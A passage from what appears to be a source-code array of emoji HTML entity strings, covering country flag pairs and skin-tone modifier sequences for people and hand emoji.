'&#x1f1ee;&#x1f1e8;', '&#x1f1ee;&#x1f1e9;', '&#x1f1ee;&#x1f1ea;', '&#x1f1ee;&#x1f1f1;', '&#x1f1ee;&#x1f1f2;', '&#x1f1ee;&#x1f1f3;', '&#x1f1ee;&#x1f1f4;', '&#x1f1ee;&#x1f1f6;', '&#x1f1ee;&#x1f1f7;', '&#x1f1ee;&#x1f1f8;', '&#x1f1ee;&#x1f1f9;', '&#x1f1ef;&#x1f1ea;', '&#x1f1ef;&#x1f1f2;', '&#x1f1ef;&#x1f1f4;', '&#x1f1ef;&#x1f1f5;', '&#x1f1f0;&#x1f1ea;', '&#x1f1f0;&#x1f1ec;', '&#x1f1f0;&#x1f1ed;', '&#x1f1f0;&#x1f1ee;', '&#x1f1f0;&#x1f1f2;', '&#x1f1f0;&#x1f1f3;', '&#x1f1f0;&#x1f1f5;', '&#x1f1f0;&#x1f1f7;', '&#x1f1f0;&#x1f1fc;', '&#x1f1f0;&#x1f1fe;', '&#x1f1f0;&#x1f1ff;', '&#x1f1f1;&#x1f1e6;', '&#x1f1f1;&#x1f1e7;', '&#x1f1f1;&#x1f1e8;', '&#x1f1f1;&#x1f1ee;', '&#x1f1f1;&#x1f1f0;', '&#x1f1f1;&#x1f1f7;', '&#x1f1f1;&#x1f1f8;', '&#x1f1f1;&#x1f1f9;', '&#x1f1f1;&#x1f1fa;', '&#x1f1f1;&#x1f1fb;', '&#x1f1f1;&#x1f1fe;', '&#x1f1f2;&#x1f1e6;', '&#x1f1f2;&#x1f1e8;', '&#x1f1f2;&#x1f1e9;', '&#x1f1f2;&#x1f1ea;', '&#x1f1f2;&#x1f1eb;', '&#x1f1f2;&#x1f1ec;', '&#x1f1f2;&#x1f1ed;', '&#x1f1f2;&#x1f1f0;', '&#x1f1f2;&#x1f1f1;', '&#x1f1f2;&#x1f1f2;', '&#x1f1f2;&#x1f1f3;', '&#x1f1f2;&#x1f1f4;', '&#x1f1f2;&#x1f1f5;', '&#x1f1f2;&#x1f1f6;', '&#x1f1f2;&#x1f1f7;', '&#x1f1f2;&#x1f1f8;', '&#x1f1f2;&#x1f1f9;', '&#x1f1f2;&#x1f1fa;', '&#x1f1f2;&#x1f1fb;', '&#x1f1f2;&#x1f1fc;', '&#x1f1f2;&#x1f1fd;', '&#x1f1f2;&#x1f1fe;', '&#x1f1f2;&#x1f1ff;', '&#x1f1f3;&#x1f1e6;', '&#x1f1f3;&#x1f1e8;', '&#x1f1f3;&#x1f1ea;', '&#x1f1f3;&#x1f1eb;', '&#x1f1f3;&#x1f1ec;', '&#x1f1f3;&#x1f1ee;', '&#x1f1f3;&#x1f1f1;', '&#x1f1f3;&#x1f1f4;', '&#x1f1f3;&#x1f1f5;', '&#x1f1f3;&#x1f1f7;', '&#x1f1f3;&#x1f1fa;', '&#x1f1f3;&#x1f1ff;', '&#x1f1f4;&#x1f1f2;', '&#x1f1f5;&#x1f1e6;', '&#x1f1f5;&#x1f1ea;', '&#x1f1f5;&#x1f1eb;', '&#x1f1f5;&#x1f1ec;', '&#x1f1f5;&#x1f1ed;', '&#x1f1f5;&#x1f1f0;', '&#x1f1f5;&#x1f1f1;', '&#x1f1f5;&#x1f1f2;', '&#x1f1f5;&#x1f1f3;', '&#x1f1f5;&#x1f1f7;', '&#x1f1f5;&#x1f1f8;', '&#x1f1f5;&#x1f1f9;', '&#x1f1f5;&#x1f1fc;', '&#x1f1f5;&#x1f1fe;', '&#x1f1f6;&#x1f1e6;', '&#x1f1f7;&#x1f1ea;', '&#x1f1f7;&#x1f1f4;', '&#x1f1f7;&#x1f1f8;', '&#x1f1f7;&#x1f1fa;', '&#x1f1f7;&#x1f1fc;', '&#x1f1f8;&#x1f1e6;', '&#x1f1f8;&#x1f1e7;', '&#x1f1f8;&#x1f1e8;', '&#x1f1f8;&#x1f1e9;', '&#x1f1f8;&#x1f1ea;', '&#x1f1f8;&#x1f1ec;', '&#x1f1f8;&#x1f1ed;', '&#x1f1f8;&#x1f1ee;', '&#x1f1f8;&#x1f1ef;', '&#x1f1f8;&#x1f1f0;', '&#x1f1f8;&#x1f1f1;', '&#x1f1f8;&#x1f1f2;', '&#x1f1f8;&#x1f1f3;', '&#x1f1f8;&#x1f1f4;', '&#x1f1f8;&#x1f1f7;', '&#x1f1f8;&#x1f1f8;', '&#x1f1f8;&#x1f1f9;', '&#x1f1f8;&#x1f1fb;', '&#x1f1f8;&#x1f1fd;', '&#x1f1f8;&#x1f1fe;', '&#x1f1f8;&#x1f1ff;', '&#x1f1f9;&#x1f1e6;', '&#x1f1f9;&#x1f1e8;', '&#x1f1f9;&#x1f1e9;', '&#x1f1f9;&#x1f1eb;', '&#x1f1f9;&#x1f1ec;', '&#x1f1f9;&#x1f1ed;', '&#x1f1f9;&#x1f1ef;', '&#x1f1f9;&#x1f1f0;', '&#x1f1f9;&#x1f1f1;', '&#x1f1f9;&#x1f1f2;', '&#x1f1f9;&#x1f1f3;', '&#x1f1f9;&#x1f1f4;', '&#x1f1f9;&#x1f1f7;', '&#x1f1f9;&#x1f1f9;', '&#x1f1f9;&#x1f1fb;', '&#x1f1f9;&#x1f1fc;', '&#x1f1f9;&#x1f1ff;', '&#x1f1fa;&#x1f1e6;', '&#x1f1fa;&#x1f1ec;', '&#x1f1fa;&#x1f1f2;', '&#x1f1fa;&#x1f1f3;', '&#x1f1fa;&#x1f1f8;', '&#x1f1fa;&#x1f1fe;', '&#x1f1fa;&#x1f1ff;', '&#x1f1fb;&#x1f1e6;', '&#x1f1fb;&#x1f1e8;', '&#x1f1fb;&#x1f1ea;', '&#x1f1fb;&#x1f1ec;', '&#x1f1fb;&#x1f1ee;', '&#x1f1fb;&#x1f1f3;', '&#x1f1fb;&#x1f1fa;', '&#x1f1fc;&#x1f1eb;', '&#x1f1fc;&#x1f1f8;', '&#x1f1fd;&#x1f1f0;', '&#x1f1fe;&#x1f1ea;', '&#x1f1fe;&#x1f1f9;', '&#x1f1ff;&#x1f1e6;', '&#x1f1ff;&#x1f1f2;', '&#x1f1ff;&#x1f1fc;', '&#x1f385;&#x1f3fb;', '&#x1f385;&#x1f3fc;', '&#x1f385;&#x1f3fd;', '&#x1f385;&#x1f3fe;', '&#x1f385;&#x1f3ff;', '&#x1f3c2;&#x1f3fb;', '&#x1f3c2;&#x1f3fc;', '&#x1f3c2;&#x1f3fd;', '&#x1f3c2;&#x1f3fe;', '&#x1f3c2;&#x1f3ff;', '&#x1f3c3;&#x1f3fb;', '&#x1f3c3;&#x1f3fc;', '&#x1f3c3;&#x1f3fd;', '&#x1f3c3;&#x1f3fe;', '&#x1f3c3;&#x1f3ff;', '&#x1f3c4;&#x1f3fb;', '&#x1f3c4;&#x1f3fc;', '&#x1f3c4;&#x1f3fd;', '&#x1f3c4;&#x1f3fe;', '&#x1f3c4;&#x1f3ff;', '&#x1f3c7;&#x1f3fb;', '&#x1f3c7;&#x1f3fc;', '&#x1f3c7;&#x1f3fd;', '&#x1f3c7;&#x1f3fe;', '&#x1f3c7;&#x1f3ff;', '&#x1f3ca;&#x1f3fb;', '&#x1f3ca;&#x1f3fc;', '&#x1f3ca;&#x1f3fd;', '&#x1f3ca;&#x1f3fe;', '&#x1f3ca;&#x1f3ff;', '&#x1f3cb;&#x1f3fb;', '&#x1f3cb;&#x1f3fc;', '&#x1f3cb;&#x1f3fd;', '&#x1f3cb;&#x1f3fe;', '&#x1f3cb;&#x1f3ff;', '&#x1f3cc;&#x1f3fb;', '&#x1f3cc;&#x1f3fc;', '&#x1f3cc;&#x1f3fd;', '&#x1f3cc;&#x1f3fe;', '&#x1f3cc;&#x1f3ff;', '&#x1f442;&#x1f3fb;', '&#x1f442;&#x1f3fc;', '&#x1f442;&#x1f3fd;', '&#x1f442;&#x1f3fe;', '&#x1f442;&#x1f3ff;', '&#x1f443;&#x1f3fb;', '&#x1f443;&#x1f3fc;', '&#x1f443;&#x1f3fd;', '&#x1f443;&#x1f3fe;', '&#x1f443;&#x1f3ff;', '&#x1f446;&#x1f3fb;', '&#x1f446;&#x1f3fc;', '&#x1f446;&#x1f3fd;', '&#x1f446;&#x1f3fe;', '&#x1f446;&#x1f3ff;', '&#x1f447;&#x1f3fb;', '&#x1f447;&#x1f3fc;', '&#x1f447;&#x1f3fd;', '&#x1f447;&#x1f3fe;', '&#x1f447;&#x1f3ff;', '&#x1f448;&#x1f3fb;', '&#x1f448;&#x1f3fc;', '&#x1f448;&#x1f3fd;', '&#x1f448;&#x1f3fe;', '&#x1f448;&#x1f3ff;', '&#x1f449;&#x1f3fb;', '&#x1f449;&#x1f3fc;', '&#x1f449;&#x1f3fd;', '&#x1f449;&#x1f3fe;', '&#x1f449;&#x1f3ff;', '&#x1f44a;&#x1f3fb;', '&#x1f44a;&#x1f3fc;', '&#x1f44a;&#x1f3fd;', '&#x1f44a;&#x1f3fe;', '&#x1f44a;&#x1f3ff;', '&#x1f44b;&#x1f3fb;', '&#x1f44b;&#x1f3fc;', '&#x1f44b;&#x1f3fd;', '&#x1f44b;&#x1f3fe;', '&#x1f44b;&#x1f3ff;', '&#x1f44c;&#x1f3fb;', '&#x1f44c;&#x1f3fc;', '&#x1f44c;&#x1f3fd;', '&#x1f44c;&#x1f3fe;', '&#x1f44c;&#x1f3ff;', '&#x1f44d;&#x1f3fb;', '&#x1f44d;&#x1f3fc;', '&#x1f44d;&#x1f3fd;', '&#x1f44d;&#x1f3fe;', '&#x1f44d;&#x1f3ff;', '&#x1f44e;&#x1f3fb;', '&#x1f44e;&#x1f3fc;', '&#x1f44e;&#x1f3fd;', '&#x1f44e;&#x1f3fe;', '&#x1f44e;&#x1f3ff;', '&#x1f44f;&#x1f3fb;', '&#x1f44f;&#x1f3fc;', '&#x1f44f;&#x1f3fd;', '&#x1f44f;&#x1f3fe;', '&#x1f44f;&#x1f3ff;', '&#x1f450;&#x1f3fb;', '&#x1f450;&#x1f3fc;', '&#x1f450;&#x1f3fd;', '&#x1f450;&#x1f3fe;', '&#x1f450;&#x1f3ff;', '&#x1f466;&#x1f3fb;', '&#x1f466;&#x1f3fc;', '&#x1f466;&#x1f3fd;', '&#x1f466;&#x1f3fe;', '&#x1f466;&#x1f3ff;', '&#x1f467;&#x1f3fb;', '&#x1f467;&#x1f3fc;', '&#x1f467;&#x1f3fd;', '&#x1f467;&#x1f3fe;', '&#x1f467;&#x1f3ff;', '&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3ff;', '&#x1f46b;&#x1f3fb;', '&#x1f46b;&#x1f3fc;', '&#x1f46b;&#x1f3fd;', '&#x1f46b;&#x1f3fe;', '&#x1f46b;&#x1f3ff;', '&#x1f46c;&#x1f3fb;', '&#x1f46c;&#x1f3fc;', '&#x1f46c;&#x1f3fd;', '&#x1f46c;&#x1f3fe;', '&#x1f46c;&#x1f3ff;', '&#x1f46d;&#x1f3fb;', '&#x1f46d;&#x1f3fc;', '&#x1f46d;&#x1f3fd;', '&#x1f46d;&#x1f3fe;', '&#x1f46d;&#x1f3ff;', '&#x1f46e;&#x1f3fb;', '&#x1f46e;&#x1f3fc;', '&#x1f46e;&#x1f3fd;', '&#x1f46e;&#x1f3fe;', '&#x1f46e;&#x1f3ff;', '&#x1f470;&#x1f3fb;', '&#x1f470;&#x1f3fc;', '&#x1f470;&#x1f3fd;', '&#x1f470;&#x1f3fe;', '&#x1f470;&#x1f3ff;', '&#x1f471;&#x1f3fb;', '&#x1f471;&#x1f3fc;', '&#x1f471;&#x1f3fd;', '&#x1f471;&#x1f3fe;', '&#x1f471;&#x1f3ff;', '&#x1f472;&#x1f3fb;', '&#x1f472;&#x1f3fc;', '&#x1f472;&#x1f3fd;', '&#x1f472;&#x1f3fe;', '&#x1f472;&#x1f3ff;', '&#x1f473;&#x1f3fb;', '&#x1f473;&#x1f3fc;', '&#x1f473;&#x1f3fd;', '&#x1f473;&#x1f3fe;', '&#x1f473;&#x1f3ff;', '&#x1f474;&#x1f3fb;', '&#x1f474;&#x1f3fc;', '&#x1f474;&#x1f3fd;', '&#x1f474;&#x1f3fe;', '&#x1f474;&#x1f3ff;', '&#x1f475;&#x1f3fb;', '&#x1f475;&#x1f3fc;', '&#x1f475;&#x1f3fd;', '&#x1f475;&#x1f3fe;', '&#x1f475;&#x1f3ff;', '&#x1f476;&#x1f3fb;', '&#x1f476;&#x1f3fc;', '&#x1f476;&#x1f3fd;', '&#x1f476;&#x1f3fe;', '&#x1f476;&#x1f3ff;', '&#x1f477;&#x1f3fb;', '&#x1f477;&#x1f3fc;', '&#x1f477;&#x1f3fd;', '&#x1f477;&#x1f3fe;', '&#x1f477;&#x1f3ff;', '&#x1f478;&#x1f3fb;', '&#x1f478;&#x1f3fc;', '&#x1f478;&#x1f3fd;', '&#x1f478;&#x1f3fe;', '&#x1f478;&#x1f3ff;', '&#x1f47c;&#x1f3fb;', '&#x1f47c;&#x1f3fc;', '&#x1f47c;&#x1f3fd;', '&#x1f47c;&#x1f3fe;', '&#x1f47c;&#x1f3ff;', '&#x1f481;&#x1f3fb;', '&#x1f481;&#x1f3fc;', '&#x1f481;&#x1f3fd;', '&#x1f481;&#x1f3fe;', '&#x1f481;&#x1f3ff;', '&#x1f482;&#x1f3fb;', '&#x1f482;&#x1f3fc;', '&#x1f482;&#x1f3fd;', '&#x1f482;&#x1f3fe;', '&#x1f482;&#x1f3ff;', '&#x1f483;&#x1f3fb;', '&#x1f483;&#x1f3fc;', '&#x1f483;&#x1f3fd;', '&#x1f483;&#x1f3fe;', '&#x1f483;&#x1f3ff;', '&#x1f485;&#x1f3fb;', '&#x1f485;&#x1f3fc;', '&#x1f485;&#x1f3fd;', '&#x1f485;&#x1f3fe;', '&#x1f485;&#x1f3ff;', '&#x1f486;&#x1f3fb;', '&#x1f486;&#x1f3fc;', '&#x1f486;&#x1f3fd;', '&#x1f486;&#x1f3fe;', '&#x1f486;&#x1f3ff;', '&#x1f487;&#x1f3fb;', '&#x1f487;&#x1f3fc;', '&#x1f487;&#x1f3fd;', '&#x1f487;&#x1f3fe;', '&#x1f487;&#x1f3ff;', '&#x1f48f;&#x1f3fb;', '&#x1f48f;&#x1f3fc;', '&#x1f48f;&#x1f3fd;', '&#x1f48f;&#x1f3fe;', '&#x1f48f;&#x1f3ff;', '&#x1f491;&#x1f3fb;', '&#x1f491;&#x1f3fc;', '&#x1f491;&#x1f3fd;', '&#x1f491;&#x1f3fe;', '&#x1f491;&#x1f3ff;', '&#x1f4aa;&#x1f3fb;', '&#x1f4aa;&#x1f3fc;', '&#x1f4aa;&#x1f3fd;', '&#x1f4aa;&#x1f3fe;', '&#x1f4aa;&#x1f3ff;', '&#x1f574;&#x1f3fb;', '&#x1f574;&#x1f3fc;', '&#x1f574;&#x1f3fd;', '&#x1f574;&#x1f3fe;', '&#x1f574;&#x1f3ff;', '&#x1f575;&#x1f3fb;', '&#x1f575;&#x1f3fc;', '&#x1f575;&#x1f3fd;', '&#x1f575;&#x1f3fe;', '&#x1f575;&#x1f3ff;', '&#x1f57a;&#x1f3fb;', '&#x1f57a;&#x1f3fc;', '&#x1f57a;&#x1f3fd;', '&#x1f57a;&#x1f3fe;', '&#x1f57a;&#x1f3ff;', '&#x1f590;&#x1f3fb;', '&#x1f590;&#x1f3fc;', '&#x1f590;&#x1f3fd;', '&#x1f590;&#x1f3fe;', '&#x1f590;&#x1f3ff;', '&#x1f595;&#x1f3fb;', '&#x1f595;&#x1f3fc;', '&#x1f595;&#x1f3fd;', '&#x1f595;&#x1f3fe;', '&#x1f595;&#x1f3ff;', '&#x1f596;&#x1f3fb;', '&#x1f596;&#x1f3fc;', '&#x1f596;&#x1f3fd;', '&#x1f596;&#x1f3fe;', '&#x1f596;&#x1f3ff;', '&#x1f645;&#x1f3fb;', '&#x1f645;&#x1f3fc;', '&#x1f645;&#x1f3fd;', '&#x1f645;&#x1f3fe;', '&#x1f645;&#x1f3ff;', '&#x1f646;&#x1f3fb;', '&#x1f646;&#x1f3fc;', '&#x1f646;&#x1f3fd;', '&#x1f646;&#x1f3fe;', '&#x1f646;&#x1f3ff;', '&#x1f647;&#x1f3fb;', '&#x1f647;&#x1f3fc;', '&#x1f647;&#x1f3fd;', '&#x1f647;&#x1f3fe;', '&#x1f647;&#x1f3ff;', '&#x1f64b;&#x1f3fb;', '&#x1f64b;&#x1f3fc;', '&#x1f64b;&#x1f3fd;', '&#x1f64b;&#x1f3fe;', '&#x1f64b;&#x1f3ff;', '&#x1f64c;&#x1f3fb;', '&#x1f64c;&#x1f3fc;', '&#x1f64c;&#x1f3fd;', '&#x1f64c;&#x1f3fe;', '&#x1f64c;&#x1f3ff;', '&#x1f64d;&#x1f3fb;', '&#x1f64d;&#x1f3fc;', '&#x1f64d;&#x1f3fd;', '&#x1f64d;&#x1f3fe;', '&#x1f64d;&#x1f3ff;', '&#x1f64e;&#x1f3fb;', '&#x1f64e;&#x1f3fc;', '&#x1f64e;&#x1f3fd;', '&#x1f64e;&#x1f3fe;', '&#x1f64e;&#x1f3ff;', '&#x1f64f;&#x1f3fb;', '&#x1f64f;&#x1f3fc;', '&#x1f64f;&#x1f3fd;', '&#x1f64f;&#x1f3fe;', '&#x1f64f;&#x1f3ff;', '&#x1f6a3;&#x1f3fb;', '&#x1f6a3;&#x1f3fc;', '&#x1f6a3;&#x1f3fd;', '&#x1f6a3;&#x1f3fe;', '&#x1f6a3;&#x1f3ff;', '&#x1f6b4;&#x1f3fb;', '&#x1f6b4;&#x1f3fc;', '&#x1f6b4;&#x1f3fd;', '&#x1f6b4;&#x1f3fe;', '&#x1f6b4;&#x1f3ff;', '&#x1f6b5;&#x1f3fb;', '&#x1f6b5;&#x1f3fc;', '&#x1f6b5;&#x1f3fd;', '&#x1f6b5;&#x1f3fe;', '&#x1f6b5;&#x1f3ff;', '&#x1f6b6;&#x1f3fb;', '&#x1f6b6;&#x1f3fc;', '&#x1f6b6;&#x1f3fd;', '&#x1f6b6;&#x1f3fe;', '&#x1f6b6;&#x1f3ff;', '&#x1f6c0;&#x1f3fb;', '&#x1f6c0;&#x1f3fc;', '&#x1f6c0;&#x1f3fd;', '&#x1f6c0;&#x1f3fe;', '&#x1f6c0;&#x1f3ff;', '&#x1f6cc;&#x1f3fb;', '&#x1f6cc;&#x1f3fc;', '&#x1f6cc;&#x1f3fd;', '&#x1f6cc;&#x1f3fe;', '&#x1f6cc;&#x1f3ff;', '&#x1f90c;&#x1f3fb;', '&#x1f90c;&#x1f3fc;', '&#x1f90c;&#x1f3fd;', '&#x1f90c;&#x1f3fe;', '&#x1f90c;&#x1f3ff;', '&#x1f90f;&#x1f3fb;', '&#x1f90f;&#x1f3fc;', '&#x1f90f;&#x1f3fd;', '&#x1f90f;&#x1f3fe;', '&#x1f90f;&#x1f3ff;', '&#x1f918;&#x1f3fb;', '&#x1f918;&#x1f3fc;', '&#x1f918;&#x1f3fd;', '&#x1f918;&#x1f3fe;', '&#x1f918;&#x1f3ff;', '&#x1f919;&#x1f3fb;', '&#x1f919;&#x1f3fc;', '&#x1f919;&#x1f3fd;', '&#x1f919;&#x1f3fe;', '&#x1f919;&#x1f3ff;', '&#x1f91a;&#x1f3fb;', '&#x1f91a;&#x1f3fc;', '&#x1f91a;&#x1f3fd;', '&#x1f91a;&#x1f3fe;', '&#x1f91a;&#x1f3ff;', '&#x1f91b;&#x1f3fb;', '&#x1f91b;&#x1f3fc;', '&#x1f91b;&#x1f3fd;', '&#x1f91b;&#x1f3fe;', '&#x1f91b;&#x1f3ff;', '&#x1f91c;&#x1f3fb;', '&#x1f91c;&#x1f3fc;', '&#x1f91c;&#x1f3fd;', '&#x1f91c;&#x1f3fe;', '&#x1f91c;&#x1f3ff;', '&#x1f91d;&#x1f3fb;', '&#x1f91d;&#x1f3fc;', '&#x1f91d;&#x1f3fd;', '&#x1f91d;&#x1f3fe;', '&#x1f91d;&#x1f3ff;', '&#x1f91e;&#x1f3fb;', '&#x1f91e;&#x1f3fc;', '&#x1f91e;&#x1f3fd;', '&#x1f91e;&#x1f3fe;', '&#x1f91e;&#x1f3ff;', '&#x1f91f;&#x1f3fb;', '&#x1f91f;&#x1f3fc;', '&#x1f91f;&#x1f3fd;', '&#x1f91f;&#x1f3fe;', '&#x1f91f;&#x1f3ff;', '&#x1f926;&#x1f3fb;', '&#x1f926;&#x1f3fc;', '&#x1f926;&#x1f3fd;', '&#x1f926;&#x1f3fe;', '&#x1f926;&#x1f3ff;', '&#x1f930;&#x1f3fb;', '&#x1f930;&#x1f3fc;', '&#x1f930;&#x1f3fd;', '&#x1f930;&#x1f3fe;', '&#x1f930;&#x1f3ff;', '&#x1f931;&#x1f3fb;', '&#x1f931;&#x1f3fc;', '&#x1f931;&#x1f3fd;', '&#x1f931;&#x1f3fe;', '&#x1f931;&#x1f3ff;', '&#x1f932;&#x1f3fb;', '&#x1f932;&#x1f3fc;', '&#x1f932;&#x1f3fd;', '&#x1f932;&#x1f3fe;', '&#x1f932;&#x1f3ff;', '&#x1f933;&#x1f3fb;', '&#x1f933;&#x1f3fc;', '&#x1f933;&#x1f3fd;', '&#x1f933;&#x1f3fe;', '&#x1f933;&#x1f3ff;', '&#x1f934;&#x1f3fb;', '&#x1f934;&#x1f3fc;', '&#x1f934;&#x1f3fd;', '&#x1f934;&#x1f3fe;', '&#x1f934;&#x1f3ff;', '&#x1f935;&#x1f3fb;', '&#x1f935;&#x1f3fc;', '&#x1f935;&#x1f3fd;', '&#x1f935;&#x1f3fe;', '&#x1f935;&#x1f3ff;', '&#x1f936;&#x1f3fb;', '&#x1f936;&#x1f3fc;', '&#x1f936;&#x1f3fd;', '&#x1f936;&#x1f3fe;', '&#x1f936;&#x1f3ff;', '&#x1f937;&#x1f3fb;', '&#x1f937;&#x1f3fc;', '&#x1f937;&#x1f3fd;', '&#x1f937;&#x1f3fe;', '&#x1f937;&#x1f3ff;', '&#x1f938;&#x1f3fb;', '&#x1f938;&#x1f3fc;', '&#x1f938;&#x1f3fd;', '&#x1f938;&#x1f3fe;', '&#x1f938;&#x1f3ff;', '&#x1f939;&#x1f3fb;', '&#x1f939;&#x1f3fc;', '&#x1f939;&#x1f3fd;', '&#x1f939;&#x1f3fe;', '&#x1f939;&#x1f3ff;', '&#x1f93d;&#x1f3fb;', '&#x1f93d;&#x1f3fc;', '&#x1f93d;&#x1f3fd;', '&#x1f93d;&#x1f3fe;', '&#x1f93d;&#x1f3ff;', '&#x1f93e;&#x1f3fb;', '&#x1f93e;&#x1f3fc;', '&#x1f93e;&#x1f3fd;', '&#x1f93e;&#x1f3fe;', '&#x1f93e;&#x1f3ff;', '&#x1f977;&#x1f3fb;', '&#x1f977;&#x1f3fc;', '&#x1f977;&#x1f3fd;', '&#x1f977;&#x1f3fe;', '&#x1f977;&#x1f3ff;', '&#x1f9b5;&#x1f3fb;', '&#x1f9b5;&#x1f3fc;', '&#x1f9b5;&#x1f3fd;', '&#x1f9b5;&#x1f3fe;', '&#x1f9b5;&#x1f3ff;', '&#x1f9b6;&#x1f3fb;', '&#x1f9b6;&#x1f3fc;', '&#x1f9b6;&#x1f3fd;', '&#x1f9b6;&#x1f3fe;', '&#x1f9b6;&#x1f3ff;', '&#x1f9b8;&#x1f3fb;', '&#x1f9b8;&#x1f3fc;', '&#x1f9b8;&#x1f3fd;', '&#x1f9b8;&#x1f3fe;', '&#x1f9b8;&#x1f3ff;', '&#x1f9b9;&#x1f3fb;', '&#x1f9b9;&#x1f3fc;', '&#x1f9b9;&#x1f3fd;', '&#x1f9b9;&#x1f3fe;', '&#x1f9b9;&#x1f3ff;', '&#x1f9bb;&#x1f3fb;', '&#x1f9bb;&#x1f3fc;', '&#x1f9bb;&#x1f3fd;', '&#x1f9bb;&#x1f3fe;', '&#x1f9bb;&#x1f3ff;', '&#x1f9cd;&#x1f3fb;', '&#x1f9cd;&#x1f3fc;', '&#x1f9cd;&#x1f3fd;', '&#x1f9cd;&#x1f3fe;', '&#x1f9cd;&#x1f3ff;', '&#x1f9ce;&#x1f3fb;', '&#x1f9ce;&#x1f3fc;', '&#x1f9ce;&#x1f3fd;', '&#x1f9ce;&#x1f3fe;', '&#x1f9ce;&#x1f3ff;', '&#x1f9cf;&#x1f3fb;', '&#x1f9cf;&#x1f3fc;', '&#x1f9cf;&#x1f3fd;', '&#x1f9cf;&#x1f3fe;', '&#x1f9cf;&#x1f3ff;', '&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3ff;', '&#x1f9d2;&#x1f3fb;', '&#x1f9d2;&#x1f3fc;', '&#x1f9d2;&#x1f3fd;', '&#x1f9d2;&#x1f3fe;', '&#x1f9d2;&#x1f3ff;', '&#x1f9d3;&#x1f3fb;', '&#x1f9d3;&#x1f3fc;', '&#x1f9d3;&#x1f3fd;', '&#x1f9d3;&#x1f3fe;', '&#x1f9d3;&#x1f3ff;', '&#x1f9d4;&#x1f3fb;', '&#x1f9d4;&#x1f3fc;', '&#x1f9d4;&#x1f3fd;', '&#x1f9d4;&#x1f3fe;', '&#x1f9d4;&#x1f3ff;', '&#x1f9d5;&#x1f3fb;', '&#x1f9d5;&#x1f3fc;', '&#x1f9d5;&#x1f3fd;', '&#x1f9d5;&#x1f3fe;', '&#x1f9d5;&#x1f3ff;', '&#x1f9d6;&#x1f3fb;', '&#x1f9d6;&#x1f3fc;', '&#x1f9d6;&#x1f3fd;', '&#x1f9d6;&#x1f3fe;', '&#x1f9d6;&#x1f3ff;', '&#x1f9d7;&#x1f3fb;', '&#x1f9d7;&#x1f3fc;', '&#x1f9d7;&#x1f3fd;', '&#x1f9d7;&#x1f3fe;', '&#x1f9d7;&#x1f3ff;', '&#x1f9d8;&#x1f3fb;', '&#x1f9d8;&#x1f3fc;', '&#x1f9d8;&#x1f3fd;', '&#x1f9d8;&#x1f3fe;', '&#x1f9d8;&#x1f3ff;', '&#x1f9d9;&#x1f3fb;', '&#x1f9d9;&#x1f3fc;', '&#x1f9d9;&#x1f3fd;', '&#x1f9d9;&#x1f3fe;', '&#x1f9d9;&#x1f3ff;', '&#x1f9da;&#x1f3fb;', '&#x1f9da;&#x1f3fc;', '&#x1f9da;&#x1f3fd;', '&#x1f9da;&#x1f3fe;', '&#x1f9da;&#x1f3ff;', '&#x1f9db;&#x1f3fb;', '&#x1f9db;&#x1f3fc;', '&#x1f9db;&#x1f3fd;', '&#x1f9db;&#x1f3fe;', '&#x1f9db;&#x1f3ff;', '&#x1f9dc;&#x1f3fb;', '&#x1f9dc;&#x1f3fc;', '&#x1f9dc;&#x1f3fd;', '&#x1f9dc;&#x1f3fe;', '&#x1f9dc;&#x1f3ff;', '&#x1f9dd;&#x1f3fb;', '&#x1f9dd;&#x1f3fc;', '&#x1f9dd;&#x1f3fd;', '&#x1f9dd;&#x1f3fe;', '&#x1f9dd;&#x1f3ff;', '&#x1fac3;&#x1f3fb;', '&#x1fac3;&#x1f3fc;', '&#x1fac3;&#x1f3fd;', '&#x1fac3;&#x1f3fe;', '&#x1fac3;&#x1f3ff;', '&#x1fac4;&#x1f3fb;', '&#x1fac4;&#x1f3fc;', '&#x1fac4;&#x1f3fd;', '&#x1fac4;&#x1f3fe;', '&#x1fac4;&#x1f3ff;', '&#x1fac5;&#x1f3fb;', '&#x1fac5;&#x1f3fc;', '&#x1fac5;&#x1f3fd;', '&#x1fac5;&#x1f3fe;', '&#x1fac5;&#x1f3ff;', '&#x1faf0;&#x1f3fb;', '&#x1faf0;&#x1f3fc;', '&#x1faf0;&#x1f3fd;', '&#x1faf0;&#x1f3fe;', '&#x1faf0;&#x1f3ff;', '&#x1faf1;&#x1f3fb;', '&#x1faf1;&#x1f3fc;', '&#x1faf1;&#x1f3fd;', '&#x1faf1;&#x1f3fe;', '&#x1faf1;&#x1f3ff;', '&#x1faf2;&#x1f3fb;', '&#x1faf2;&#x1f3fc;', '&#x1faf2;&#x1f3fd;', '&#x1faf2;&#x1f3fe;', '&#x1faf2;&#x1f3ff;', '&#x1faf3;&#x1f3fb;', '&#x1faf3;&#x1f3fc;', '&#x1faf3;&#x1f3fd;', '&#x1faf3;&#x1f3fe;', '&#x1faf3;&#x1f3ff;', '&#x1faf4;&#x1f3fb;', '&#x1faf4;&#x1f3fc;', '&#x1faf4;&#x1f3fd;', '&#x1faf4;&#x1f3fe;', '&#x1faf4;&#x1f3ff;', '&#x1faf5;&#x1f3fb;', '&#x1faf5;&#x1f3fc;', '&#x1faf5;&#x1f3fd;', '&#x1faf5;&#x1f3fe;', '&#x1faf5;&#x1f3ff;', '&#x1faf6;&#x1f3fb;', '&#x1faf6;&#x1f3fc;', '&#x1faf6;&#x1f3fd;', '&#x1faf6;&#x1f3fe;', '&#x1faf6;&#x1f3ff;', '&#x1faf7;&#x1f3fb;', '&#x1faf7;&#x1f3fc;', '&#x1faf7;&#x1f3fd;', '&#x1faf7;&#x1f3fe;', '&#x1faf7;&#x1f3ff;', '&#x1faf8;&#x1f3fb;', '&#x1faf8;&#x1f3fc;', '&#x1faf8;&#x1f3fd;', '&#x1faf8;&#x1f3fe;', '&#x1faf8;&#x1f3ff;', '&#x261d;&#x1f3fb;', '&#x261d;&#x1f3fc;', '&#x261d;&#x1f3fd;', '&#x261d;&#x1f3fe;', '&#x261d;&#x1f3ff;', '&#x26f7;&#x1f3fb;', '&#x26f7;&#x1f3fc;', '&#x26f7;&#x1f3fd;', 